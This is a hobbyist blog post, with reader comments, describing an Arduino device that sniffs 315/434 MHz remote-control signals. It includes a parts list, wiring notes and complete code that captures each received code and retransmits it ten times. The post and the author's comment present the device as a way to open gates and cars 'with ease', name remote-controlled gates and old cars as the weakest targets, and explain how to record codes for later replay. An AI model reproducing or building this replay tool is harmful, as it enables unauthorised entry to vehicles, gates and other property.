RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

Arduino

The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315mhz/434mhz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.

 

TIP – The size of the antenna is VERY important. Don’t neglect it – use the right length and use a wave calculator for future reference.

 

The story

I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315Mhz/434Mhz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kind of RF receivers out-there. You have been warned.

Current version of the sniffer will resend whatever it sniffs 10 times. Behavior is easily changeable.

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.

 

Shopping List

Amount Part Type Properties
2 Inductor wire antenna
1 Red LED – 5mm package 5 mm [THT]; leg yes; color Red (633nm)
1 Arduino Uno (Rev3) type Arduino UNO (Rev3)
1 315Mhz RF-LINK_RX package rf-link_rx; part # WRL-10533
1 434Mhz RF-LINK_RX package rf-link_rx; part # WRL-10532
1 315Mhz RF-LINK_TX package rf-link_tx; part # WRL-10535
1 434Mhz RF-LINK_TX package rf-link_tx; part # WRL-10534

 

Scheme

We connect both receivers/transmitters like the following:

RF_Sniffer_bb

Code

And here is the Arduino code. Use at your own risk.


/*
 * RF Sniffer (C) Elia Yehuda 2014
 * 
 * This program was coded.
 *
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.
 *
 */

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.
#define RESEND_SNIFFED_VALUES 10

// ye, thats the led pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();
// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup()
{
        // print fast to console
        Serial.begin(115200);

        // 315 receiver on interrupt #0 (pin #2)
        rf315Switch.enableReceive(0);  
        // 315 transmitter on pin #4
        rf315Switch.enableTransmit(4);
        // how many resends
        rf315Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);
        
        // 434 receiver on interrupt #1 (pin #3)
        rf434Switch.enableReceive(1);  
        // 434 transmitter on pin #5
        rf434Switch.enableTransmit(5);
        // how many resends
        rf434Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);
        
        Serial.println("[+] Listening");
}

// simple decimal-to-binary-ascii procedure
char *tobin32(unsigned long x)
{
        static char b[33];
        b[32] = '\0';
        
        for ( int z = 0; z < 32; z++) {
                b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
        }
        
        return b;
}

void process_rf_value(RCSwitch rfswitch, int rf)
{
        char str[120];
        unsigned long value;

        // flash a light to show transmission
        digitalWrite(LED_PIN, true);
        
        value = rfswitch.getReceivedValue();
        if (value) {
                sprintf(str, "[+] %d Received: %s / %010lu / %02d bit / Protocol = %d",
                        rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );
        } else {
                sprintf(str, "[-] %d Received: Unknown encoding (0)", rf);
        }
        Serial.println(str);

        // resend the sniffed value (RESEND_SNIFFED_VALUES times)
        rfswitch.send(value, rfswitch.getReceivedBitlength());
        
        // reset the switch to allow more data to come
        rfswitch.resetAvailable();
        // stop light to show end of transmission
        digitalWrite(LED_PIN, false);
}

void loop()
{

        if (rf315Switch.available()) {
                process_rf_value(rf315Switch, 315);
        }

        if (rf434Switch.available()) {
                process_rf_value(rf434Switch, 434);
        }
}
About these ads

6 thoughts on “RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

    1. ofc.

      The hw scheme I provided is 100% same as the one I used in my testings. The sw part is a stripped-down code of my full project, but is enough to get one started.

      With a few modifications to the code, one can simply record the sniffed data instead of immediately resending it. Also, for useful results, when resending, a delay() should be considered for obvious reasons ;)

      Most vulnerable targets I found are remote-controlled gates and old cars. Also weather stations seems to produce a lot of noise.

      Using same logic, one can add 816Mhz tx/rx to cover most widely used RF out there. and rule them all :)

  1. Awesome project. Can u give any details as to how you can save the codes it sniffs? I’m looking to do an automation project and this fits the bill.

    Thanks

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s